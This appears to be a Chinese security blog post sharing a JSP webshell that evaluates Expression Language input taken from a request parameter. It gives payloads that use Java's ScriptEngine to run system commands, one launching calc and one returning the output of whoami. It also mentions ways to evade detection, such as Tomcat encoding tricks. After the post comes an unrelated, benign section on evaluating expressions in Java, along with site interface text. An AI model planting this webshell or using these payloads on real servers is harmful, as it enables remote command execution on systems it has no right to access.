java el表达式+scriptengine webshell 分享

前言:

翻自己以前写过的东西,在土司翻到了以前提到过的这个问题,这个问题之前查看别的师傅写的文章,很早就有了相关的解决方法,但是一直没回复这种的解决思路,这里分享下,主要分享el表达式加scriptengine的思路,也当作水篇文章吧。
image.png

运用:

el表达式的shell

<%@ page import="org.apache.jasper.runtime.PageContextImpl" %>
<%
    String res = (String)
            PageContextImpl.proprietaryEvaluate(request.getParameter("test"),
                    String.class, pageContext, null);
    out.print(res);
%>

无回显:

code=${"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("new+java.lang.ProcessBuilder['(java.lang.String[])'](['cmd','/c','calc']).start()")}

image.png

有回显:

回显payload:

${"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("var+s=[3];s[0]=\"cmd\";s[1]=\"/c\";s[2]=\"whoami\";var+p=java.lang.Runtime.getRuntime().exec(s);var+sc=new+java.util.Scanner(p.getInputStream(),\"GBK\").useDelimiter(\"\\\\A\");var+result=sc.hasNext()?sc.next():\"\";sc.close();result;")}

image.png

其他思路:

4ccbbca01491389ba5ab4a89aa99fa8.jpg
当然啦远程webshell和jni马的思路也是可以绕过的,也不一定要用这个思路,甚至于还可以利用补天大会老面提到的一个点,tomcat的编码特性来进行绕过。
如编码特性图:webshell内容为
image.png
执行:
image.png

最后:

好好学习,好好锻炼,好好生活。
7f337659e65b63146b8fd4a6ea5523f.jpg

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Java中执行表达式有多种方式,以下是其中几种常见的方式: 1. 使用eval()方法:eval()方法可以将字符串表达式作为参数传递进去,然后执行该表达式并返回结果。但需要注意的是,eval()方法只能执行单行表达式,不能执行多行语句。例如: ``` String expression = "2 + 3 * 4"; ScriptEngineManager manager = new ScriptEngineManager(); ScriptEngine engine = manager.getEngineByName("js"); Object result = engine.eval(expression); System.out.println(result); // 输出14 ``` 2. 使用JavaScript引擎:Java中提供了JavaScript引擎,可以用来执行JavaScript表达式。例如: ``` String expression = "2 + 3 * 4"; ScriptEngineManager manager = new ScriptEngineManager(); ScriptEngine engine = manager.getEngineByName("JavaScript"); Object result = engine.eval(expression); System.out.println(result); // 输出14 ``` 3. 使用Groovy:Groovy是一种基于Java语言的动态语言,它可以直接执行表达式,并且支持更灵活的语法。例如: ``` String expression = "2 + 3 * 4"; Binding binding = new Binding(); GroovyShell shell = new GroovyShell(binding); Object result = shell.evaluate(expression); System.out.println(result); // 输出14 ``` 4. 使用JEXL:JEXL是一个基于Java的表达式语言,它可以简化Java代码中的表达式处理。例如: ``` String expression = "2 + 3 * 4"; JexlEngine engine = new JexlEngine(); JexlExpression expr = engine.createExpression(expression); Object result = expr.evaluate(null); System.out.println(result); // 输出14 ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

goddemon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值